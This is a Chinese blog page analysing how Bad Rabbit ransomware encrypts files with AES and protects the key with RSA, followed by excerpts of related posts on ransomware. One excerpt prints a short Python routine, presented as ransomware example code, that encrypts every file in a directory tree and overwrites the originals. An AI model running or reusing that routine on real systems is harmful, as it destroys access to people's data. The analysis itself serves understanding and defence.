勒索病毒加密过程分析1——简易加密型(坏兔子病毒)

最新推荐文章于 2022-05-21 11:50:46 发布
最新推荐文章于 2022-05-21 11:50:46 发布
阅读量372 收藏
点赞数
原文链接:http://www.cnblogs.com/QKSword/p/10409618.html
版权

视频:https://www.bilibili.com/video/av44160165

 

目录

1.勒索病毒加密过程总结

2.加密算法的简介

3.坏兔子病毒的加密过程分析

4.参考和附件

 

内容

1.勒索病毒加密过程总结

对于病毒加密过程的总结,详细总结:http://blog.topsec.com.cn/archives/3598

 

2.加密算法的简介

  • 对称加密算法:使用密钥对某一数据加密后,使用相同的密钥进行解密。勒索病毒中一般使用对称加密算法对重要文件或数据进行加密,如果获得密钥就可以对加密文件进行解密。为什么使用对称加密而不是非对称加密?主要是使用对称加密的速度快,可以短时间内把电脑里的文件加密起来从而进行勒索。常见的对称加密算法有:AES、3DES、RC5等

 

  • 非对称加密算法:存在两个密钥,公钥用于对数据进行加密,私钥用于对数据进行解密。勒索病毒一般硬编码了公钥,用于加密前面对称加密中用到的密钥,而私钥留在病毒编写者手里,只有拥有私钥才可以完成全部的解密,这里详细看下面病毒的分析。常见的非对称加密算法:RSA、ECDH等

 

  • 散列算法和其他算法:勒索病毒在生成或处理字符串时用到(AES密钥,RSA公钥等)。常见的算法:MD5、SHA、Base64等

 

3.坏兔子病毒加密过程分析

坏兔子病毒的加密流程,简单的看就是随机生成一个密钥用来对文件进行AES对称加密,然后再对这个AES密钥利用非对称加密算法进行加密。最后会保存起来加密后的AES密钥并显示在勒索信息里,如果想要解密文件,就得提交加密后的AES密钥和赎金。

  • 生成AES密钥

 

  • 利用AES密钥对文件进行加密

 

  • 对AES密钥进行加密

 

4.参考和附件

参考

天融信关于勒索软件加密过程研究:http://blog.topsec.com.cn/2018/10/%E5%A4%A9%E8%9E%8D%E4%BF%A1%E5%85%B3%E4%BA%8E%E5%8B%92%E7%B4%A2%E8%BD%AF%E4%BB%B6%E5%8A%A0%E5%AF%86%E8%BF%87%E7%A8%8B%E7%A0%94%E7%A9%B6/

附件

链接:https://pan.baidu.com/s/1x1oWbMH-eVEOZ8fBUIUV1Q,解压密码:GeekFZ

转载于:https://www.cnblogs.com/QKSword/p/10409618.html

weixin_30394669
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
兔子勒索病毒事件基本分析报告.pdf
02-28
2017年10月24日,360CERT监测到有一起名为“兔子”(the Bad Rabbit)的勒索病毒正在东欧和俄罗斯地区传播,据悉,目前影响了俄罗斯部分媒体组织,乌克兰的部分业务,包括基辅的公共交通系统和国家敖德萨机场,此外还影响了保加利亚和土耳其。
[图解] 勒索病毒加密原理
Qode
08-13 8110
示意图 原理 公开密钥密码体制 要求密钥成对出现,一个用于加密,另一个用于解密,并且且不可能从其中一个推导出另一个。 加密过程 病毒作者首先在自己电脑上生成的 私钥Q 和 公钥Q,算法可以基于RSA或者椭圆曲线。 病毒在目标电脑上随机生成 私钥Z 和 公钥Z 将用户电脑上的文件通过 公钥Z 加密 将用户电脑上的 私钥Z 通过 公钥Q 加密 删除用户电脑上的 私钥Z 、公钥Q、数据 解密过程 支付...
勒索病毒终极方案:不怕被加密,无惧被公开
云盒子企业云盘官方账号,17年专注文档安全
08-17 780
勒索病毒和企业的关系可谓相恨相杀,互相成长。 起初,勒索病毒团伙通过加密文件要求受害者支付赎金解密数据,但勒索病毒仅活跃了几年,这个老套路就被企业定期备份重要数据的方式给破解了。 当解密赚钱的道路越走越难,勒索病毒团伙又以公开或贩卖数据作为威胁,甚至对具有攻击价值、却又很难从外部突破的企业发展“内线”,访问攻击目标的内部网络。 最近非常活跃的勒索病毒软件LockBit2.0就是非常典的例子。 被LockBit2.0加密文件及勒索信 上周,勒索病毒软件LockBit2.0攻击了全球IT咨询巨头
病毒常用方法之加密
pureman_mega的博客
03-11 808
恶意软件为了躲避杀毒软件的扫描会将一些敏感的字符或数据进行加密,来改变原有的样子(特征).下面是一个解密的反汇编和C代码: ... ;这个函数调用时有一个参数压入栈,另外还有两个寄存器的值被使用 ;lea eax,[ebx-4] ebx 长度,从第五个字节开始处理 ;lea edi,[esi+4] esi 数据起始地址,和上面
勒索病毒加密的文件如何破解?
u011893782的博客
06-04 1万+
想要硬刚勒索病毒,脱密加密的文件,是很难的。之前,我已经介绍了数字签名,勒索病毒使用了公钥加密另一个常用应用“数字信封”技术。 想要恢复勒索病毒加密的文件,可以破解黑客的公钥,或者破解黑客加密文件的临时对称密钥。而这2种算法,黑客都选用了目前可靠的算法,不可能被破解。 为什么不能被破解?这2种算法保障着全球信息系统的安全性,如果能通过破解加密算法恢复文件,现代的信息防护技术也就都失效了。因此,如果必须恢复文件,目前的办法就是支付赎金给黑客,然后加固系统。 数字信封 不严谨的描述一下: 1.随机.
勒索病毒防御演示 SQL数据库备份防止被勒索病毒加密
04-10
介绍极佳Sql数据库备份工具如何防止数据库备份被勒索病毒加密
勒索病毒检测工具 sql数据库中勒索病毒检测完整度 数据库被勒索病毒加密检测完整度
03-16
为了让客户更加了解SQL数据库被勒索病毒加密后的损比列,我们开发了此款工具,支持MDF NDF 文件和 非压缩BAK备份文件的损率检测。 对于 丢失占比在0-50%的 一般都可以恢复,大于50%的 也有几率恢复。恢复是门...
被TeslaCrypt 3勒索病毒加密后档案的解密工具
06-12
标题 "被TeslaCrypt 3勒索病毒加密后档案的解密工具" 提及的是一个专门针对TeslaCrypt 3病毒感染的解密解决方案。TeslaCrypt 3是一种臭名昭著的恶意软件,属于勒索病毒类别,它会加密用户的个人文件,然后要求受害者...
勒索病毒应急响应自救手册.docx
06-10
1. WannaCry 勒索:WannaCry 是一种高危险性的勒索病毒,它可以感染 Windows 操作系统,通过 EternalBlue 漏洞来传播。WannaCry勒索病毒的特点是,它可以加密文件,并要求用户支付赎金来恢复数据。 2. GlobeImposter...
撒旦
luolin930315的专栏
08-09 215
第一次来这里哈哈!!!
什么是勒索病毒以及怎么防勒索病毒
a15995989443的博客
02-09 1915
在讨论如何防勒索病毒问题之前,先来了解一下勒索病毒。 什么是勒索病毒勒索病毒并不是某一个病毒,而是一类病毒的统称,主要以邮件、程序、木马、网页挂马的形式进行传播,利用各种加密算法对文件进行加密,被感染者一般无法解密,必须拿到解密的私钥才有可能破解。 已知最早的勒索软件出现于 1989 年,名为“艾滋病信息木马”(Trojan/DOS.AidsInfo,亦称“PC Cyborg木马”),其作者为 Joseph Popp。早期的勒索病毒主要通过钓鱼邮件,挂马,社交网络方式传播,使用转账等方式支付赎..
勒索病毒锁死文件加密
qq_34835962的博客
11-11 1432
勒索病毒提示信息赎金交易文本框☜不是你的语言吗?使用https://translate.google.com 你的档案怎么了? 您的所有文件都使用RSA-2048强加密保护。 更多关于使用RSA-2048的加密密钥的信息可以在这里找到:http://en.wikipedia.org/wiki/RSA_(加密系统) 这是怎么发生的? ! ! !特别为您的PC生成的个人RSA-2048...
勒索病毒解密工具的汇总
LiBai'S BLOG
05-21 2万+
以下为日常搜集的勒索病毒解密工具的汇总。希望对大家有用! [777 Ransom] Trend Micro Ransomware解密器用来解密777勒索软件加密的文件 https://success.trendmicro.com/solution/1114221 [AES_NI Ransom] Rakhni解密器用来解密AES_NI勒索软件加密的文件 http://media.kaspersky.com/utilities/VirusUtilities/EN/rakhnidecryptor.zip [Age
勒索软件(勒索病毒)加解密原理和不能解密原因
王教主的博客
07-20 3421
勒索病毒一般通过AES对本地文件进行加密,由于AES是对称加密,所以理论上可以通过反编译勒索病毒,找到AES的加密密钥,但为何被勒索病毒加密后,只有交付赎金一条路呢? 原因是勒索病毒作者,1.使用本地RSA算法将AES密钥加密;2.使用RSA等非对称加密算法,将受害者本地生成的RSA私钥进行了加密。通过这两步,只有作者使用自己私钥解密受害者RSA私钥后,受害者才能还原到本地AES密钥,从而使用AES算法解密文件。 勒索软件加密原理: 勒索软件解密原理图 ...
python斐波那契兔子问题_Python兔子毒药问题实例分析
weixin_39922769的博客
12-03 257
本文实例分析了Python兔子毒药问题。分享给大家供大家参考。具体分析如下:问题大致是这样的:1000瓶无色无味的液体,其中一瓶为毒药,其它皆为清水,毒药只取一滴与清水混合为一瓶也可以毒死兔子。现在有10只兔子,当兔子喝下毒药两个小时后死去,请设计一种方案,能够在24小时内找到这瓶毒药。................2分钟后前面的问题你一定想清楚了,那么略改动一下:1000瓶无色无味的液体,其中...
勒索病毒工作原理
热门推荐
那些零零散散的算法
05-22 2万+
前些天借着Windows上的”永恒之蓝“漏洞,本来几乎快销声匿迹的加密勒索病毒又重新回到了公众视线里。由于电信等网络运营商早就封堵了可能导致中毒的445端口,所以外网影响不大,但是教育网里的同学就遭殃了,尤其是很多临毕业的学生纷纷中招,论文被加密,可能因此被迫延毕。 本文尝试着还原这些勒索病毒中文件加解密的原理,来了解为什么这些病毒这么难缠,并给出一些“破解”的可能性,虽然条件都比较苛刻。
记我的服务器被勒索病毒攻击的经历
weixin_34414650的博客
10-18 1727
出于对游戏行业的好奇,想自己搭建一套私服游戏,然后就在腾讯云上购买了一台windows2008服务器 很快系统生成了,游戏花了一个下午也部署上去玩起来了 第三天早上起来发现游戏连接不上服务器,然后打开电脑进入服务器让我大吃一惊啊:    桌面上文件全部被篡改并加了后缀,无法打开,浏览器弹出了一个网页,显示的就是上述内容,我就知道被病毒勒索  然后就找腾讯云发起工单找工程师怎么解决,发现腾讯也解...
病毒分析之撒旦(Satan)勒索病毒分析解密(AES256 ECB算法)
Hades的博客
10-31 2956
病毒分析之撒旦(Satan)勒索病毒分析解密(AES256 ECB算法) 0x0病毒概况 撒旦勒索病毒主要是针对企业服务器用户进行感染加密其服务器上的文件并勒索用户的一种病毒。 撒旦病毒通过大量漏洞利用工具,扫描入侵主机。 成功入侵后加密重要文件。并生成文件用中英韩三种语言提示索要比特币赎金解密文件。 0x1恶意行为 1.主模块会释放大量攻击模块并执行,也会连接恶意IP下载病毒文件...
勒索病毒如何加密多级目录
最新发布
06-08
勒索病毒通常使用加密算法对目标文件进行加密,以防止用户访问它们,然后勒索受害者付款以获取解密密钥。 以下是一个勒索病毒可能使用的示例代码,使用AES算法对多级目录进行加密: ```python import os from cryptography.fernet import Fernet # 生成加密密钥 key = Fernet.generate_key() # 创建Fernet对象 fernet = Fernet(key) # 遍历目录并加密文件 def encrypt_directory(path): for dirpath, dirnames, filenames in os.walk(path): for filename in filenames: # 加载文件 with open(os.path.join(dirpath, filename), 'rb') as f: file_data = f.read() # 加密文件 encrypted_data = fernet.encrypt(file_data) # 将加密后的数据写回到原文件 with open(os.path.join(dirpath, filename), 'wb') as f: f.write(encrypted_data) # 保存密钥 with open('key.key', 'wb') as f: f.write(key) # 加密指定目录 encrypt_directory('/path/to/directory') ``` 在这个示例中,勒索病毒使用了Python的`cryptography`库来加密数据。它遍历指定的目录,对目录中的所有文件进行加密,并将加密后的数据写回到原文件。它还生成加密密钥并将其保存到`key.key`文件中,以便以后用于解密文件。 请注意,这只是一个示例代码,并且勒索病毒通常会加入更多的恶意代码,例如:对加密文件进行更改名称和在受害者计算机上创建勒索信息。如果您遇到了勒索病毒,请不要尝试自行解密文件,而是寻求专业帮助。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值